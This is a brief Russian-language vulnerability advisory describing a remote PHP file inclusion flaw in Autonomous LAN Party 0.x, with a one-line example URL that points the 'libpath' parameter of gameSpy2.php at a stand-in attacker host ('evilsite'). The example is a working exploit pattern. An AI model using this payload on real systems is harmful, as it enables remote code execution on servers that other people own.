Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Autonomous LAN Party 0.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий
на целевой системе.
Пример:
http://victim/path/include/SQuery/gameSpy2.php?libpath=http://evilsite